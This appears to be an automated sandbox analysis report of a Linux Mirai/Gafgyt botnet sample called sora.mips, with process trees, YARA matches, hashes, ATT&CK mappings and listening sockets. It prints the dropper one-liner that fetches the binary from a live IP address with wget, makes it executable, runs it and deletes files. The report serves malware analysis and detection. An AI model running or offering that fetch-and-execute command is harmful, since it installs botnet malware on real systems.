Chmod executable with 777: /usr/bin/chmod -> chmod 777 2to3-2.7 7z 7za 7zr GET HEAD NF POST Thunar VGAuthService X X11 Xephyr Xorg Xwayland [ aa-enabled aa-exec aconnect acpi_listen add-apt-repository addpart addr2line al al2 alsabat alsaloop alsamixer alsatplg alsaucm amidi amixer apg apgbfm aplay aplaymidi apport-bug apport-cli apport-collect apport-unpack appres appstreamcli aprofutil apropos apt apt-add-repository apt-cache apt-cdrom apt-config apt-extracttemplates apt-ftparchive apt-get apt-key apt-mark apt-sortpkgs aptdcon apturl apturl-gtk ar arch arecord arecordmidi arm2hpdl as aseqdump aseqnet asp-state4 aspell aspell-import at atobm atq atril atril-previewer atril-thumbnailer atrm automat-visualize3 avahi-browse avahi-browse-domains avahi-publish avahi-publish-address avahi-publish-service avahi-resolve avahi-resolve-address avahi-resolve-host-name avahi-set-host-name awk axfer b2sum base32 base64 basename bash bashbug batch bc bccmd bdftopcf

Jump to behavior

Source: /usr/bin/wget (PID: 6216)

File written: /usr/bin/sora.mips

Jump to dropped file

Source: submitted sample

Stderr: % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0curl: (6) Could not resolve host: cdcurl: (3) URL using bad/illegal format or missing URL--2024-04-26 08:32:16-- http://185.196.11.177/bins/sora.mipsConnecting to 185.196.11.177:80... connected.HTTP request sent, awaiting response... 200 OKLength: 28884 (28K)Saving to: sora.mips 0K .......... .......... ........ 100% 103K=0.3s2024-04-26 08:32:17 (103 KB/s) - sora.mips saved [28884/28884]: exit code = 0

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /usr/bin/wget (PID: 6216)

File: /usr/bin/sora.mips

Jump to dropped file

Sample deletes itself

Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/chmod	Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/curl	Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/rm	Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/sora.mips	Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/wget	Jump to behavior

Source: sora.mips.14.dr

Dropped file: segment LOAD with 7.892 entropy (max. 8.0)

Source: /usr/bin/curl (PID: 6214)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/sora.mips (PID: 6218)	Queries kernel information via 'uname':			Jump to behavior

Source: sora.mips, 6418.1.00005651e0fef000.00005651e103b000.rw-.sdmp	Binary or memory string: QV!/proc/2014/fd/11mips/pr1/usr/bin/vmtoolsd (deleted)
Source: sh, 6218.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6218.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6220.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6221.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6418.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6227.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6229.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6412.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6414.1.00005651e0f68000.00005651e0fef000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: sh, 6218.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6218.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6220.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6221.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6418.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6227.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6229.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6412.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6414.1.00007ffecd533000.00007ffecd554000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: sh, 6218.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6218.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6220.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6221.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6418.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6227.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6229.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6412.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6414.1.00007ffecd533000.00007ffecd554000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips./sora.mipsthinkphpSUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/usr/bin./sora.mips
Source: sh, 6218.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6218.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6220.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6221.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6418.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6227.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6229.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6412.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6414.1.00005651e0f68000.00005651e0fef000.rw-.sdmp	Binary or memory string: QVGeneralNames!/etc/qemu-binfmt/mips
Source: sora.mips, 6418.1.00005651e0fef000.00005651e103b000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips (deleted)
Source: sora.mips, 6418.1.00005651e0fef000.00005651e103b000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd (deleted)
Source: sora.mips, 6418.1.00005651e0fef000.00005651e103b000.rw-.sdmp	Binary or memory string: QV/mips/0 /proc/1622/fd/9!/proc/1890/fd/34mips/pr1/proc/2028/fd/9/mips/0!/proc/1623/exe!/proc/1890/fd/33mips/pr1/proc/2079/fd/5/mips/0!/proc/1623/fd!/proc/1890/fd/32mips/pr1/proc/2028/fd/10mips/0!/proc/1623/fd/.!/proc/1890/fd/31mips/pr1/usr/bin/qemu-mips (deleted)0!/proc/1623/fd/..!/proc/1890/fd/30mips/pr1/proc/2028/fd/11mips/0!/proc/1623/fd/0!/proc/1890/fd/29mips/pr1/proc/2079/fd/4/mips/0!/proc/1623/fd/1!/proc/1890/fd/28mips/pr1/proc/2028/fd/13mips/0!/proc/1623/fd/2!/proc/1890/fd/27mips/pr1/proc/6224/exe/mips/0!/proc/1623/fd/3!/proc/1890/fd/26mips/pr1/proc/2033/exe/mips/0!/proc/1623/fd/4!/proc/1890/fd/25mips/pr1/proc/2079/fd/3/mips/0!/proc/1623/fd/5!/proc/1890/fd/24mips/pr1/proc/2033/fd/mips/0!/proc/1623/fd/6!/proc/1890/fd/23mips/pr1`0

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Application Layer Protocol	1 Exfiltration Over Alternative Protocol	1 Service Stop
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	2 File and Directory Permissions Modification	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Hidden Files and Directories	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 File Deletion	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label	Link
/usr/bin/sora.mips	51%	ReversingLabs	Linux.Trojan.Mirai
/usr/bin/sora.mips	47%	Virustotal		Browse

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	sora.mips.14.dr	false		high

Process:	/usr/bin/wget
File Type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	28884
Entropy (8bit):	7.888388472835748
Encrypted:	false
SSDEEP:	768:E4ylAtv6pqLJM0RXaxGyUbXtheU/S2ce9IJgGlzDpbuR1J1:XMBqTRXa+Zhr/6tVJu3
MD5:	3536FDC9645687EAA6FA345EB8E3294C
SHA1:	5481A0CA12D1F371F9F2EFA92A0C84F95FB64707
SHA-256:	93BE4F45D82B5EDB6D3047BA025D2F33CF8170B569D4AE29D6FCF2CF199B9FED
SHA-512:	B0E955B6247D06222327265BC2260FC5EE376607DCF80DE96956ECA11F542E8C93EBED57E5BAB9D68EEC1CAA6FB856AC6D4D22DDFA1304DF65C1F31C12CFFC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 51% Antivirus: Virustotal, Detection: 47%, Browse
Reputation:	low
Preview:	.ELF......................\X...4.........4. ...(......................o...o...............Mp.EMp.EMp...................UPX!.h........M@..M@.......U.......?.E.h4...@b..) ..]...E..N...r.-...G.F..S.r).....)=........).G..A.l.Vg..s._[#w...=...WH...........y............`]....wrLu\|ty..."...FT.Z....j.m.x.......K...J\|.z..G9.C.K/0O.,..%{....E..!.g........jtx.c..d.r(.7~...1.y....1.]..~.0.>.].....lf.P\6c........M5u.i=%...{.y.7......IN6.. ....K..Y2.~z..Y0."Z.K]...M$....1.9.\..xd.w..b.B.!..u../.5.N.=.#......j.}K.T.....7.'..\|.K...d....o..'.4y.j@..0..h.8..w....<..NV.(;.X.../=.....z..l...V.....1.a.u..24.R...w..V.`.[.\J.....;3.2.'..C.........{.R....B.....C.. ...g.<...Ln..,....i){...]o.N..Y.....*..&.....(}{.....m..c,.+......l.x0t...0....\|..!/..."......n.t.(7..4.4...s.;..U....,....dUNnu.h.......--f.-5.......W9.........q.v..LOyK-...z...~ ....9....{.#.,.....L..........4._..C.UX.'..Fq.U..s...G.'..212.ho...~.\.a.].o.......%.]G.'...Su....u.)a.,m.w..h.1...X.9..4W.~.

Static File Info

⊘No static file info

Network Behavior

⊘Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

System Behavior

Analysis Process: sh PID: 6213, Parent PID: 6127

General

Start time (UTC):	06:32:16
Start date (UTC):	26/04/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "curl cd /tmp; wget http://185.196.11.177/bins/sora.mips; chmod 777 ; ./sora.mips thinkphp; rm -rf "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:32:16
Start date (UTC):	26/04/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:32:16
Start date (UTC):	26/04/2024
Path:	/usr/bin/curl
Arguments:	curl cd /tmp
File size:	239848 bytes
MD5 hash:	add6bc2195e82c55985ccf49fd4048e6

Start time (UTC):	06:32:16
Start date (UTC):	26/04/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:32:16
Start date (UTC):	26/04/2024
Path:	/usr/bin/wget
Arguments:	wget http://185.196.11.177/bins/sora.mips
File size:	548568 bytes
MD5 hash:	996940118df7bb2aaa718589d4e95c08

Start time (UTC):	06:32:17
Start date (UTC):	26/04/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:32:17
Start date (UTC):	26/04/2024
Path:	/usr/bin/chmod
Arguments:	chmod 777 2to3-2.7 7z 7za 7zr GET HEAD NF POST Thunar VGAuthService X X11 Xephyr Xorg Xwayland [ aa-enabled aa-exec aconnect acpi_listen add-apt-repository addpart addr2line al al2 alsabat alsaloop alsamixer alsatplg alsaucm amidi amixer apg apgbfm aplay aplaymidi apport-bug apport-cli apport-collect apport-unpack appres appstreamcli aprofutil apropos apt apt-add-repository apt-cache apt-cdrom apt-config apt-extracttemplates apt-ftparchive apt-get apt-key apt-mark apt-sortpkgs aptdcon apturl apturl-gtk ar arch arecord arecordmidi arm2hpdl as aseqdump aseqnet asp-state4 aspell aspell-import at atobm atq atril atril-previewer atril-thumbnailer atrm automat-visualize3 avahi-browse avahi-browse-domains avahi-publish avahi-publish-address avahi-publish-service avahi-resolve avahi-resolve-address avahi-resolve-host-name avahi-set-host-name awk axfer b2sum base32 base64 basename bash bashbug batch bc bccmd bdftopcf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	06:32:19
Start date (UTC):	26/04/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:32:19
Start date (UTC):	26/04/2024
Path:	/usr/bin/sora.mips
Arguments:	./sora.mips thinkphp
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	06:32:19
Start date (UTC):	26/04/2024
Path:	/usr/bin/sora.mips
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	06:32:19
Start date (UTC):	26/04/2024
Path:	/usr/bin/sora.mips
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	06:32:19
Start date (UTC):	26/04/2024
Path:	/usr/bin/sora.mips
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	06:32:19
Start date (UTC):	26/04/2024
Path:	/usr/bin/sora.mips
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	06:34:38
Start date (UTC):	26/04/2024
Path:	/usr/bin/sora.mips
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	06:34:38
Start date (UTC):	26/04/2024
Path:	/usr/bin/sora.mips
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: sora.mips PID: 6227, Parent PID: 6224

General

Start time (UTC):	06:32:19
Start date (UTC):	26/04/2024
Path:	/usr/bin/sora.mips
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	06:32:19
Start date (UTC):	26/04/2024
Path:	/usr/bin/sora.mips
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: sora.mips PID: 6412, Parent PID: 6224

General

Start time (UTC):	06:34:33
Start date (UTC):	26/04/2024
Path:	/usr/bin/sora.mips
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	06:34:33
Start date (UTC):	26/04/2024
Path:	/usr/bin/sora.mips
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	06:32:19
Start date (UTC):	26/04/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:32:19
Start date (UTC):	26/04/2024
Path:	/usr/bin/rm
Arguments:	rm -rf 2to3-2.7 7z 7za 7zr GET HEAD NF POST Thunar VGAuthService X X11 Xephyr Xorg Xwayland [ aa-enabled aa-exec aconnect acpi_listen add-apt-repository addpart addr2line al al2 alsabat alsaloop alsamixer alsatplg alsaucm amidi amixer apg apgbfm aplay aplaymidi apport-bug apport-cli apport-collect apport-unpack appres appstreamcli aprofutil apropos apt apt-add-repository apt-cache apt-cdrom apt-config apt-extracttemplates apt-ftparchive apt-get apt-key apt-mark apt-sortpkgs aptdcon apturl apturl-gtk ar arch arecord arecordmidi arm2hpdl as aseqdump aseqnet asp-state4 aspell aspell-import at atobm atq atril atril-previewer atril-thumbnailer atrm automat-visualize3 avahi-browse avahi-browse-domains avahi-publish avahi-publish-address avahi-publish-service avahi-resolve avahi-resolve-address avahi-resolve-host-name avahi-set-host-name awk axfer b2sum base32 base64 basename bash bashbug batch bc bccmd bdftopcf
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Start time (UTC):	06:32:55
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:54
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:55
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:55
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:55
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:55
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:55
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:55
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:57
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:57
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:58
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:58
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:59
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:32:59
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:33:00
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:33:00
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:33:02
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:33:37
Start date (UTC):	26/04/2024
Path:	/usr/libexec/gvfsd-fuse
Arguments:	-
File size:	47632 bytes
MD5 hash:	d18fbf1cbf8eb57b17fac48b7b4be933

Start time (UTC):	06:35:07
Start date (UTC):	26/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::0	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::23	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::53413	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::80	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::52869	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	Socket: 0.0.0.0::37215	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::0	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::23	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::53413	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::80	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::52869	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	Socket: 0.0.0.0::37215	Jump to behavior

Source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: sora.mips PID: 6221, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: sora.mips PID: 6229, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: sora.mips PID: 6229, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: sora.mips PID: 6418, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
